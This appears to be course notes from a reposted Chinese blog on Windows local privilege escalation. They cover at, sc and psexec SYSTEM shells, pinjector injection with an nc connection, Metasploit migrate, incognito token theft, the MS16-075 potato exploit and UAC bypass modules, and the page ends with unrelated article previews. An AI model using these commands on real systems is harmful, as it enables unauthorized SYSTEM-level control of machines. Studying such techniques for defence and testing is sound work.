第101天:权限提升-Win 本地用户进程注入令牌窃取ATSCPS 服务命令

目录

思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

sc

PS

案例二:WIN-本地用户-进程迁移注入获取

msf

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

土豆溢出

案例四: uac原理与绕过


思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

适用版本:Win2000 & Win2003 & XP 中还是存在的,在 Win7 以后被剔除

2003

at 21:00 /interactive cmd

18分的时候弹出窗口

sc

只适用于旧版本2003之前的

#创建一个名叫 syscmd 的新的交互式的 cmd 执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd

PS

适用版本: Test in Win2012 and Win2008 & Win2016 其他未测 基本可以
工具下载地址: PsTools - Sysinternals | Microsoft Learn

执行命令

psexec.exe -accepteula -s -i -d cmd #调用运行 cmd

执行效果

win7

win2012

win2019

案例二:WIN-本地用户-进程迁移注入获取

win2003以下的版本可以利用工具pinjector

pinjector -p 420 cmd 3333  #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333

msf

利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀

首先2008先反弹shell,admin

查看进程为system的

在该进程下添加

migrate pid号

测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用

win2019的测试结果

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

执行的前提是身份一定是大于iis用户,否则无法执行

命令

use incognito    
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

win2019测试

个人主机win11,能否成功主要是看是否设置了uac

土豆溢出

项目下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限

这里我执行失败了,未知原因

execute -cH -f ./potato.exe   #执行烂土豆程序use incognito   #加载窃取模块list_tokens -u   #查看可窃取的令牌impersonate_token "NT AUTHORITY\SYSTEM"   #窃取令牌

案例四: uac原理与绕过

利用msf  getsystem命令会自动帮你提权到system(在可以提权的条件下)

如何开启或关闭uac?

 

当时最低权限的时候

可以提权成功

 二级(每次切换得重启系统)

提权失败

搜索绕过uac的模块

使用该模块

2级与3级使用方法相似

4级

设置以后启动大部分程序都会弹出窗口需要确认

四级更加无法启动了

利用模块

exploit/windows/local/ask

会弹出窗口进行请求,如果对方点击就能提权,不点就不行

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/22814.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Qt】Frame和Widget的区别

1. 这两个伙计有啥区别? 2. 区别 2.1 Frame继承自Widget,多了一些专有的功能 Frame Widget 2.2 Frame可以设置边框

C51学习归纳4 --- 矩阵键盘

一、开发板原理图 我们可以看到这个键盘是4*4的,行可以由4个数据接口接收(P1_4~7),列可以由4个数据接口接收(P1_0~3)。 所以我们可让行作为扫描方向,或者列作为扫描方向,进行按键扫描。如何扫描…

VS2017配置OpenCV4.5.1

VS2017配置OpenCV 一、下载OpenCV二、配置OpenCV的电脑环境变量三、配置visual Studio添加路径复制文件到C盘 四、如何使用注意运行时选择Debug x64 五、报错:VSOpencv出现:xxx处有未经处理的异常: Microsoft C 异常: cv::Exception,位于内存…

鸟哥私房菜 摘录

鸟哥私房菜 摘录 解決問題的順序学习的基本方针,提供给大家参考: 解決問題的順序 先查閱硬體(有沒有超頻/記憶體模組/周邊網路設備的好壞等等);檢查 /var/log 底下的登錄檔,尤其是 /var/log/messages 的內容;不要急&a…

@vue-office/excel遇到的问题 error in ./src/components/gem-histogram.base.vue?vuetype=templateid=691572

下载后一直抱这个错误 10:39:39 - Building for production... 10:40:36 ERROR Failed to compile with 41 errors2:40:31 AM 10:40:36 10:40:36 error in ./src/components/gem-histogram.base.vue?vue&typetemplate&id691572bb&scopedtrue 10:40:36 …

踩坑:ffmpeg_extract_subclip() 切分视频时阻塞卡死

之前跑代码时经常卡死,不知道问题出在哪 ffmpeg_extract_subclip(tmp_video_path, test_data["start"], test_data["end"], targetnamevideo_path)后来发现此代码时常会阻塞,不报error不退出,就一直在那卡着。 ffmpeg_…

GaussDB的数种形态

GaussDB作为一种新兴的关系型数据库产品,似乎有点让人摸不着头脑。有朋友问我GaussDB单机版怎么样,有人说GaussDB是分布式数据库,还有人说它是云数据库,还有人会把GaussDB和华为的数据仓库GaussDB DWS混为一谈。确实,公…

算法学习笔记——时间复杂度和空间复杂度

时间复杂度和空间复杂度 常数操作: 固定时间的操作,执行时间和数据量无关 位运算 > 算数运算 > 寻址 > 哈希运算,都是常数操作,哈希运算操作时间最慢 链表的get(i)方法不是常数操作,因为链表不是连续的存储…

颠沛流离学二叉树(完结撒花篇)

本篇会加入个人的所谓鱼式疯言 ❤️❤️❤️鱼式疯言:❤️❤️❤️此疯言非彼疯言 而是理解过并总结出来通俗易懂的大白话, 小编会尽可能的在每个概念后插入鱼式疯言,帮助大家理解的. 🤭🤭🤭可能说的不是那么严谨.但小编初心是能让更多人…

MT2083 屠龙勇者

思路&#xff1a; 跟上题类似&#xff0c;贪心策略&#xff1a;w从小到大排序&#xff0c;每个头找到第一个>d的w 代码&#xff1a; #include <bits/stdc.h> using namespace std; #define ll long long const int N 1e5 10; int n, m; int d[N]; int w[N]; int …

Spring Security 注册过滤器关键点与最佳实践

在 Spring Security 框架中&#xff0c;注册过滤器是实现身份验证和授权的关键组件。正确配置和使用注册过滤器对于确保应用程序的安全性至关重要。以下是一些关于 Spring Security 注册过滤器的注意事项和最佳实践。 过滤器链顺序&#xff1a; 注册过滤器通常位于过滤器链的末…

使用 ultralytics 摄像头yolo推理

使用 ultralytics 摄像头yolo推理 官方网站 https://docs.ultralytics.com/ github https://github.com/ultralytics/ultralytics 搭建环境 # Install the ultralytics package using conda conda install -c conda-forge ultralyticslinux下摄像头推理 import cv2 from u…

[next.js]pwa缓存

配置Next.js (v14 App Router模式) 使其支持PWA缓存&#xff0c;配置server worker和mainfest.json&#xff0c;让项目支持离线访问和可安装。 安装依赖next-pwa npm i next-pwa配置next.config.js const path require(path);const withPWAInit require(next-pwa);// 判断…

让代码变得优雅和高效,给你以下建议,推荐每个人都就要看看

编写高效且优雅的Java代码不仅关乎程序的性能&#xff0c;也涉及到代码的可读性、可维护性和遵循的最佳实践。下面是一些关键原则和示例&#xff0c;帮助你实现这一目标&#xff1a; 1. 遵循编码规范 命名规范&#xff1a;变量、方法、类名应具有描述性&#xff0c;遵循驼峰命…

ValueError: Couldn‘t instantiate the backend tokenizer from one of: (1)·

ValueError: Couldn’t instantiate the backend tokenizer from one of: (1) a t 解决方案 !pip install transformers[sentencepiece]

想要成长就要持续地学习,而如何学习更有效率呢

为什么很多人学了知识&#xff0c;但是总感觉记不住&#xff0c;用不上呢&#xff1f; 在学习的过程中&#xff0c;为什么总感觉没什么进步呢&#xff1f; 看了很多书&#xff0c;为什么总感觉没什么用呢&#xff1f; 要说明这些问题&#xff0c;首先我们要知道一个好的、完整的…

Chrome跳转新的标签页自动打开控制台设置方法

Chrome跳转新的标签页自动打开控制台设置方法 文章目录 Chrome跳转新的标签页自动打开控制台设置方法1. 首先打开控制台2. 点击设置3. 选择Preferences -> Global -> 选中 Auto-open DevTools for popups4. 回到控制台勾选 preserve log保留日志![请添加图片描述](https:…

python:Dataframe字符串合并的高效方法(一文详解)

python&#xff1a;Dataframe字符串合并的高效方法&#xff08;一文详解&#xff09; 1.摘要2.讲解2个场景的解决方案2.1 对于场景1&#xff1a;合并df中其中几列字符串的场景&#xff0c;有以下2种方案。2.2 对于场景2&#xff1a;将df中的字符串与外部字符串合并&#xff0c;…

String-拼接和反转1

在 Java 中&#xff0c;字符串&#xff08;String&#xff09;是非常核心的一个类&#xff0c;它代表字符序列&#xff0c;可以用于存储和操作文本。在编程中&#xff0c;字符串的拼接和反转是常见的操作&#xff0c;下面我将详细解释这两种操作。 ### 字符串拼接 字符串拼接是…

图像背景去除工具:removebg

文章目录 简介面向不同用户价格 简介 removebg&#xff0c;就是remove background&#xff0c;是一款智能图片背景去除工具。 在免费使用时&#xff0c;用到的是本地的CPU。我第一次试用时&#xff0c;图片刚上传之后&#xff0c;电脑的帧率便直线下降&#xff0c;鼠标都拖不…